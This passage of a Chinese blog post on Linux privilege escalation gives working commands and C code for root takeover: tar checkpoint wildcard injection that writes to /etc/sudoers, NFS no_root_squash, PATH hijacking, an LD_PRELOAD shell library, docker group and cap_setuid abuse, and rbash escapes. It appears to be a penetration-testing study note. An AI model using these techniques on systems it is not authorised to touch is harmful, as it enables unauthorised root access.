<p>在操作过程中，如果有一个文件名的名字是一个参数，那么执行过程中，就会被当作参数运行，例如目录下有一个叫<code>--help</code>的文件，当cat查看该文件内容时，实际上是显示 cat的帮助信息</p>
<p>![](E:\Personal Notes\WEB\Drone aircraft\assets\159.png)</p>
<p>我们创建定时备份脚本 crontab.sh</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/bash</span><br><span class="hljs-built_in">cd</span> /var/www/html/<br>tar -zvcf /var/backups/html.tar *<br></code></pre></td></tr></table></figure>

<p>在<code>/ect/crontab</code>中添加</p>
<figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs groovy">*<span class="hljs-regexp">/1 *   * * *   root    /</span><span class="hljs-keyword">var</span><span class="hljs-regexp">/www/</span>html/crontab.sh<br></code></pre></td></tr></table></figure>

<p>在tar命令中有一个checkpoint参数，即检查点，比如checkpoint&#x3D;1，则代表压缩过程中每压缩一个文件就去执行一个检查操作。</p>
<p>而这个检查操作的参数是–checkpoint-action&#x3D;exec&#x3D;，后面可以跟要执行的命令。</p>
<p>利用思路就是我们写入一个sh脚本，该脚本作用是修改sudoers文件，把当前用户添加进去，获得sudo所有权，从而进行提权。然后利用checkpoint-action&#x3D;exec&#x3D;接一个执行sh脚本的命令即可。</p>
<p>利用过程:首先创建两个文件，名字为参数名，然后再创建一个sh脚本，内容为向sudoers追加权限，相关命令如下:</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-keyword">echo</span> &#x27;<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;test ALL=(root) NOPASSWD: ALL&quot;</span> &gt;&gt; <span class="hljs-string">/etc/sudoers</span>&#x27; &gt; test.sh<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&quot;</span> &gt; <span class="hljs-params">--checkpoint=1</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&quot;</span> &gt; <span class="hljs-string">&quot;--checkpoint-action=exec=sh test.sh&quot;</span><br></code></pre></td></tr></table></figure>

<p>在 <code>/var/www/html</code>目录中执行了上述三条命令后 一分钟后就能提升到root权限</p>
<h3 id="5-NFS提权"><a href="#5-NFS提权" class="headerlink" title="5.NFS提权"></a>5.NFS提权</h3><p>NFS是network file system缩写，网络文件系统，用来挂载某个目录或文件进行共享，默认是2049端口，功能类似于windows的共享。</p>
<p>安装nfs服务端</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">sudo apt-<span class="hljs-keyword">get</span> install nfs-kernel-<span class="hljs-keyword">server</span><br></code></pre></td></tr></table></figure>

<p>安装后修改配置文件 <code>/etc/exports</code>,这里将home目录进行挂载共享</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arduino">/home *(rw,no_root_squash)<br></code></pre></td></tr></table></figure>

<p>其中&#x2F;home是要挂载的目录,*代表允许连接的主机，这里是所有，rw是读写权限，no_root_squash代表客户端允许以root权限访问nfs。</p>
<p>重启相关服务</p>
<figure class="highlight swift"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs swift"># nfs通过rpc通信，这里把rpcbind重启<br>sudo <span class="hljs-regexp">/etc/</span><span class="hljs-keyword">init</span>.d<span class="hljs-operator">/</span>rpcbind restart<br>sudo <span class="hljs-regexp">/etc/</span><span class="hljs-keyword">init</span>.d<span class="hljs-operator">/</span>nfs<span class="hljs-operator">-</span>kernel<span class="hljs-operator">-</span>server restart<br></code></pre></td></tr></table></figure>

<p>此时就配置好了，可以通过showmount命令来列出目标机的共享目录，e参数显示NFS服务器的输出清单。 </p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/160-1717158637642-3.png" srcset="/img/loading.gif" lazyload></p>
<p>或者用nmap相关脚本进行扫描</p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/161.png" srcset="/img/loading.gif" lazyload></p>
<p>当nfs配置了读写权限，且允许客户端以root访问时，就会存在安全隐患。测试如下:</p>
<p>首先客户端把目标机nfs的共享挂载到本地，然后把bash复制进去并赋予suid权限，操作如下图。</p>
<p>攻击机</p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/162.png" srcset="/img/loading.gif" lazyload></p>
<p>此时目标机的home目录下就会有一个具有suid权限的bash。</p>
<h3 id="6-Path环境变量提权"><a href="#6-Path环境变量提权" class="headerlink" title="6.Path环境变量提权"></a>6.Path环境变量提权</h3><p>Linux中的PATH是一个环境变量，它指定了可执行程序所在的目录，例如bin和sbin目录，当我们在终端运行一个命令时，系统就会根据PATH来查找相关的可执行文件。</p>
<p>可以执行env命令列出所有的环境变量，然后找到PATH，或者grep进行结果筛选，或者echo出$PATH值，命令如下。</p>
<p>![](E:\Personal Notes\WEB\Drone aircraft\assets\163.png)</p>
<p>首先编译以下c代码，功能为调用id命令</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-selector-id">#include</span>&lt;stdio<span class="hljs-selector-class">.h</span>&gt;<br>void <span class="hljs-selector-tag">main</span>()&#123;<br>	<span class="hljs-built_in">setuid</span>(<span class="hljs-number">0</span>);<br>	<span class="hljs-built_in">setgid</span>(<span class="hljs-number">0</span>);<br>	<span class="hljs-built_in">system</span>(&quot;whoami&quot;);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>用root权限赋给 shell suid 权限</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs dockerfile">sudo chmown root <span class="hljs-keyword">shell</span><span class="language-bash"></span><br><span class="language-bash">sudo <span class="hljs-built_in">chmod</span> u+s shell</span><br></code></pre></td></tr></table></figure>

<p>利用:到tmp目录下，把bash写到一个whoami文件中，然后修改PATH变量添加tmp目录，再去执行shell,就会获得一个root权限。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;/bin/bash&quot;</span> &gt; <span class="hljs-built_in">whoami</span><br><span class="hljs-built_in">chmod</span> 777 <span class="hljs-built_in">whoami</span><br><span class="hljs-built_in">export</span> PATH=/tmp:<span class="hljs-variable">$PATH</span><br></code></pre></td></tr></table></figure>

<p>过程: root给一个可执行文件赋予了suid，而此文件又调用了whoami命令，这时修改PATH把tmp添加到头的位置，系统再执行就会先去tmp目录下找，tmp目录下放的是恶意程序，从而导致恶意程序以root权限运行</p>
<p>情况:这种情况适用于，给普通用户分配了个可执行程序，且该程序有suid权限，我们又知道该程序会调用哪些命令，那么就可以结合PATH来进行提权。</p>
<h3 id="7-LD-PRELOAD提权"><a href="#7-LD-PRELOAD提权" class="headerlink" title="7.LD_PRELOAD提权"></a>7.LD_PRELOAD提权</h3><p>LD_PRELOAD是Linux下的一个环境变量，程序运行时都会加载一些so文件，类似于windows下程序加载dll，而LD_PRELOAD可以指定程序运行前加载的动态连接库。</p>
<p>测试前先按如下配置一下sudoers文件，以test用户为例，添加一个find命令和一个LD_PRELOAD。</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs subunit"><span class="hljs-keyword">test	</span>ALL=(ALL:ALL) NOPASSWD:/usr/bin/find<br>Default		env_keep += LD_PRELOAD<br></code></pre></td></tr></table></figure>

<p>env_keep说明</p>
<p>例如aaa用户有一个aaa的环境变量，当通过su切换到bbb用户时，再查看env环境变量，aaa就没有了，也就意味着用户的切换不会带着环境变量一块切过去。而想保持某个环境不受用户切换的影响，那么可以在sudoers文件中设置env_keep.</p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/164.png" srcset="/img/loading.gif" lazyload></p>
<p>我们有一个find的sudo权，且env_keep中定义了LD_PRELOAD，那么我们就可以定义一个恶意的so文件，然后sudo运行find时指定LD_PRELOAD来加载我们自己的so文件，就可以实现提权。</p>
<p>so文件的c代码如下</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/types.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><br><span class="hljs-type">void</span> _init()&#123;<br>	<span class="hljs-built_in">unsetenv</span>(<span class="hljs-string">&quot;LD_PRELOAD&quot;</span>);<br>	<span class="hljs-built_in">setgid</span>(<span class="hljs-number">0</span>);<br>	<span class="hljs-built_in">setuid</span>(<span class="hljs-number">0</span>);<br>	<span class="hljs-built_in">system</span>(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>然后进行编译-fPIC-shared参数简单理解就是动态编辑共享库，可以进行公共调用，nostartfiles参数代表该库运行不会去调用系统的其它库，避免影响自己的程序执行。</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">gcc <span class="hljs-keyword">shell.c </span>-fPIC -<span class="hljs-keyword">shared </span>-o <span class="hljs-keyword">shell.so </span>-nostartfiles<br></code></pre></td></tr></table></figure>

<p>编译后我们使用sudo运行find并指定LD__PRELOAD为我们编译shell.so文件，这时find就会先调用shell.so,导致我们的代码被执行，返回的权限为root</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim">sudo LD_PRELOAD=/tmp/<span class="hljs-keyword">shell</span>.<span class="hljs-keyword">so</span> <span class="hljs-keyword">find</span><br></code></pre></td></tr></table></figure>

<p>注意点:如果使用自己攻击机编译的so文件，传到目标机可能普通用户没有执行权限，这时需要加下权限。如果目标机支持gcc编译，也可以直接在目标机编译。</p>
<h3 id="8-Docker提权"><a href="#8-Docker提权" class="headerlink" title="8.Docker提权"></a>8.Docker提权</h3><p>在docker中，是允许访问root用户和docker组中的其它用户的</p>
<p>首先以root身份把一个普通账号添加到docker组，这里是test用户。然后使用newgrp将root账号初始组切换为docker。</p>
<p>![](E:\Personal Notes\WEB\Drone aircraft\assets\165.png)</p>
<p>我们可以看到test已经在docker组中了</p>
<p>随后使用docker run来允许alpine镜像，v参数进行挂载，是将宿主机的root目录挂载到alpine的mnt下，使用冒号分隔。i参数是保持打开状态，t参数是分配一个tty终端，it一般结合使用，即保持通讯终端的打开。</p>
<p>这时访问docker镜像alpine，就相当于访问宿主机的root目录，权限变成了root。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker run -v /root:/mnt -it alpine       <br><span class="hljs-built_in">cd</span> /mnt<br>/mnt <span class="hljs-comment"># whoami</span><br>root<br></code></pre></td></tr></table></figure>

<h3 id="9-capability提权"><a href="#9-capability提权" class="headerlink" title="9.capability提权"></a>9.capability提权</h3><p>capability翻译为能力的意思，linux中能力的概念和suid类似，是用来让普通用户也可以做超级用户的工作，从而设置的一个机制，原来linux分的是普通用户和超级用户，后来加了能力，即赋予某某账号能力，这个账号有能力了，就可以去做事了。</p>
<figure class="highlight swift"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs swift"><span class="hljs-type">CAP_CHOWN</span>:修改文件属主的权限<br><span class="hljs-type">CAP_DAC_OVERRIDE</span>:忽略文件的<span class="hljs-type">DAC访问限制</span><br><span class="hljs-type">CAP_DAC_READ_SEARCH</span>:忽略文件读及目录搜索的<span class="hljs-type">DAC访问限制</span><br><span class="hljs-type">CAP_FOWNER：忽略文件属主ID必须和进程用户ID相匹配的限制</span><br><span class="hljs-type">CAP_FSETID</span>:允许设置文件的setuid位<br><span class="hljs-type">CAP_KILL</span>:允许对不属于自己的进程发送信号<br><span class="hljs-type">CAP_SETGID</span>:允许改变进程的组<span class="hljs-type">ID</span><br><span class="hljs-type">CAP_SETUID</span>:允许改变进程的用户<span class="hljs-type">ID</span><br><span class="hljs-type">CAP_SETPCAP</span>:允许向其他进程转移能力以及删除其他进程的能力<br><span class="hljs-type">CAP_LINUX_IMMUTABLE</span>:允许修改文件的<span class="hljs-type">IMMUTABLE和APPEND属性标志</span><br><span class="hljs-type">CAP_NET_BIND_SERVICE</span>:允许绑定到小于<span class="hljs-number">1024</span>的端口<br><span class="hljs-type">CAP_NET_BROADCAST</span>:允许网络广播和多播访问<br><span class="hljs-type">CAP_NET_ADMIN</span>:允许执行网络管理任务<br><span class="hljs-type">CAP_NET_RAW</span>:允许使用原始套接字<br><span class="hljs-type">CAP_IPC_LOCK</span>:允许锁定共享内存片段<br><span class="hljs-type">CAP_IPC_OWNER</span>:忽略<span class="hljs-type">IPC所有权检查</span><br><span class="hljs-type">CAP_SYS_MODULE</span>:允许插入和删除内核模块<br><span class="hljs-type">CAP_SYS_RAWIO</span>:允许直接访问<span class="hljs-regexp">/devport,/</span>dev<span class="hljs-regexp">/mem,/</span>dev<span class="hljs-operator">/</span>kmem及原始块设备<br><span class="hljs-type">CAP_SYS_CHROOT</span>:允许使用chroot()系统调用<br><span class="hljs-type">CAP_SYS_PTRACE</span>:允许跟踪任何进程<br><span class="hljs-type">CAP_SYS_PACCT</span>:允许执行进程的<span class="hljs-type">BSD式审计</span><br><span class="hljs-type">CAP_SYS_ADMIN</span>:允许执行系统管理任务，如加载或卸载文件系统<span class="hljs-operator">、</span>设置磁盘配额等<br><span class="hljs-type">CAP_SYS_BOOT</span>:允许重新启动系统<br><span class="hljs-type">CAP_SYS_NICE</span>:允许提升优先级及设置其他进程的优先级<br><span class="hljs-type">CAP_SYS_RESOURCE</span>:忽略资源限制<br><span class="hljs-type">CAP_SYS_TIME</span>:允许改变系统时钟<br><span class="hljs-type">CAP_SYS_TTY_CONFIG</span>:允许配置<span class="hljs-type">TTY设备</span><br><span class="hljs-type">CAP_MKNOD</span>:允许使用mknod()系统调用<br><span class="hljs-type">CAP_LEASE</span>:允许修改文件锁的<span class="hljs-type">FL_LEASE标志</span><br></code></pre></td></tr></table></figure>

<p>capability和suid的区别在于: suid是针对某个用户给权限，而capability针对的是某个程序。在设置程序能力时，有三个选项可选:</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs css">inheritable，简称<span class="hljs-selector-tag">i</span>，表示是否可继承。<br>permitted，简称<span class="hljs-selector-tag">p</span>，表示是否允许使用。<br>effective，简称e，表示特权是否有效。<br></code></pre></td></tr></table></figure>

<p>setcap命令用来设置能力，例如setcap cap_setuid+ep &#x2F;home&#x2F;demo&#x2F;python3，就表示</p>
<p>home&#x2F;demo&#x2F;python3这个程序添加了setuid能力，即改变进程uid的能力，+ep就表示能力有效，且允许使用</p>
<p>setcap设置能力，getcap读取能力。</p>
<p>getcap通过r参数来读取指定目录下有能力的程序。</p>
<p>![](E:\Personal Notes\WEB\Drone aircraft\assets\166.png)</p>
<p>能力滥用导致的提权</p>
<p>例如管理员要为python3程序设置超级权限给kali用户，但没有用suid或sudo授权，而用的是capabilities，通过的是以下命令来设置的。</p>
<p>因为root只想给kali用户的python3能力，所以这里是将程序复制到了kali用户下，如果直接设置bin下的python3程序，那么意味着任何用户都具有了相关能力</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/桌面]<br>└─$ <span class="hljs-built_in">cp</span> /usr/bin/python3 .<br>                                                                                          <br>┌──(kali㉿kali)-[~/桌面]<br>└─$ sudo <span class="hljs-built_in">setcap</span> cap_setuid+ep ./python3<br>[sudo] kali 的密码：<br>                                                                                          <br>┌──(kali㉿kali)-[~/桌面]<br>└─$ <span class="hljs-built_in">getcap</span> -r ./ 2&gt;/dev/null<br>./python3 cap_setuid=ep<br>./test.txt cap_setuid=ep<br>                                                                                          <br>┌──(kali㉿kali)-[~/桌面]<br>└─$ ./python3 -c <span class="hljs-string">&quot;import os; os.setuid(0); os.system(&#x27;/bin/bash&#x27;)&quot;</span><br>┌──(root㉿kali)-[~/桌面]<br>└─<span class="hljs-comment"># </span><br></code></pre></td></tr></table></figure>

<h3 id="10-rbash绕过"><a href="#10-rbash绕过" class="headerlink" title="10.rbash绕过"></a>10.rbash绕过</h3><p>bash是Restricted bash缩写，即受限制的bash。管理员可通过指定普通用户的bash为rbash，以此来限制相关操作。在rbash中，很多行为和命令都会被受到限制。</p>
<p>这里测试test账户，使用root将test账户的bash改为rbash</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(root㉿kali)-[~/桌面]<br>└─<span class="hljs-comment"># usermod -s /bin/rbash test</span><br><br>┌──(root㉿kali)-[~/桌面]<br>└─<span class="hljs-comment"># cat /etc/passwd | grep ^test</span><br><span class="hljs-built_in">test</span>:x:1001:1001::/home/test:/bin/rbash<br></code></pre></td></tr></table></figure>

<p>然后切换为test账号，发现环境为rbash,shell环境是rbash。</p>
<h4 id="vi绕过"><a href="#vi绕过" class="headerlink" title="vi绕过"></a>vi绕过</h4><p>可以进入vi中执行set命令将shell改为&#x2F;bin&#x2F;sh，命令如下:</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-keyword">vi</span><br>:<span class="hljs-keyword">set</span> <span class="hljs-keyword">shell</span>=/bin/<span class="hljs-keyword">sh</span><br>:<span class="hljs-keyword">shell</span><br><span class="hljs-keyword">cd</span> /etc<br><span class="hljs-keyword">pwd</span><br></code></pre></td></tr></table></figure>

<h4 id="ed"><a href="#ed" class="headerlink" title="ed"></a>ed</h4><p>ed也是一个文件编辑的命令，和vi类似，也是内联编辑模式，可输入命令，相关命令如下:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">ed<br>!<span class="hljs-string">&#x27;/bin/sh&#x27;</span><br><span class="hljs-built_in">cd</span> /etc<br><span class="hljs-built_in">pwd</span><br></code></pre></td></tr></table></figure>

<h4 id="sh、bash、dash绕过"><a href="#sh、bash、dash绕过" class="headerlink" title="sh、bash、dash绕过"></a>sh、bash、dash绕过</h4><p>默认情况下，可以在rbash中执行sh、bash、dash等命令，以此来绕过rbash。</p>
<h4 id="python、perl绕过"><a href="#python、perl绕过" class="headerlink" title="python、perl绕过"></a>python、perl绕过</h4><p>可以尝试运行python和per命令，如果允许执行，则可以用程序来调用bin&#x2F;bash绕过rbash，我这里测试python不行，per柯以，相关命令如下。</p>
<figure class="highlight pf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs pf"><span class="hljs-comment">#python</span><br>python3 -c &#x27;import <span class="hljs-keyword">os</span>; <span class="hljs-keyword">os</span>.system(<span class="hljs-string">&quot;/bin/sh&quot;</span>)&#x27;<br><span class="hljs-comment">#perl</span><br>perl -e &#x27;system(<span class="hljs-string">&quot;/bin/sh&quot;</span>)&#x27;<br></code></pre></td></tr></table></figure>

<h3 id><a href="#" class="headerlink" title></a></h3>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%8F%90%E6%9D%83/" class="print-no-link">#提权</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Linux提权</div>
      <div>http://backk0m.github.io/2024/06/01/Linux提权/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Backk0m</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年6月1日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/05/27/Headless-HTB/" title="Headless(HTB)">
                        <span class="hidden-mobile">Headless(HTB)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
